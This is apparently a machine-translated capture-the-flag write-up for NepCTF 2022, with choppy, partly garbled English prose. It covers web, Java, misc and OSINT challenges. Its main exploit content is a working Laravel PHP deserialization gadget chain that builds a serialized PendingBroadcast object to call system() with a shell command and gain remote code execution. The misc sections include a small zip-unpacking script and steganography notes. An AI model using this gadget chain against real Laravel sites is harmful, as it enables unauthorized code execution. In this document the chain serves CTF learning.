[nepctf2022] recurrence

Just Kidding

Naughty HRP use Laravel I wrote a project to welcome everyone to play Nepctf 2nd, little does one think … Unexpectedly, he was killed by bad guys Sharun Pout

www.zip Source code leakage   , I didn't understand anything and didn't pay attention to where the right entrance is , Always focus on web.php above  

Didn't notice here use The path of the imported class , Follow the path to find the deserialization entry

The process of writing at that time , exactly 9.12.2 The version of is also circulated online 9.1.8 Your chain can be hit ,

At that time, I just didn't find the right entrance and path  

https://github.com/1nhann/vulns/issues

pop1, direct rce  

<?php
namespace Illuminate\Contracts\Queue{
    interface ShouldQueue
    {
        //
    }
}

namespace Illuminate\Bus{
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;
        function __construct()
        {
            $this->queueResolver = "system";

        }
    }
}

namespace Illuminate\Broadcasting{

    use Illuminate\Contracts\Queue\ShouldQueue;

    class BroadcastEvent implements ShouldQueue {
        function __construct()
        {

        }
    }
    class PendingBroadcast{
        protected $events;
        protected $event;
        function __construct()
        {
            $this->event = new BroadcastEvent();
            $this->event->connection = "ls /";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}
namespace{
    $a = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($a));
}

  Be careful payload route , After the upload Visit the source code to see the success rce Echo of

Challenger

Naughty HRP Another language is used to write the project to welcome you , I didn't expect to let Sharun Dig

java Framework , Give it to jar, Decompile

I haven't learned java, So follow wp Go over , It's also a chain fight on the Internet

 Java Safety Thymeleaf Template injection analysis - nice_0e3 - Blog Garden

Sign in problem

binwalk Separate pictures

Get the compression package doll

import zipfile

a=""
for i in range(232,2,-1):
  a=str(i)+".zip"
  print(a)
  with zipfile.ZipFile(a) as zf:
    zf.extractall()

Extract the script from brother Peng , Decompress to the end

Originally looking for the password explosion , In fact, it is pseudo encryption

Look at the file name and you know it's keyboard traffic

Wang Yihang Usb Script shuttle

rare base 

There is only one attachment jpg I tried it and put it down without any information , I didn't expect to sign in

JPHS This tool is rarely used and I forget , No password directly seek It's coming out.

 base58 

Huahua painting Huahua  

After the attachment is downloaded It's a osz suffix , Then used 010 Look at the header of the compressed package , Just change the suffix ....

  Open it correctly osz file  

 osu open , This is a music game ,

Pie ？ trap ！

There is a license plate in the lower right corner, Joan , I didn't find it when I wrote , Shangdeyuan tea Locate Sanya It happened to be here

In the upper left corner is the bank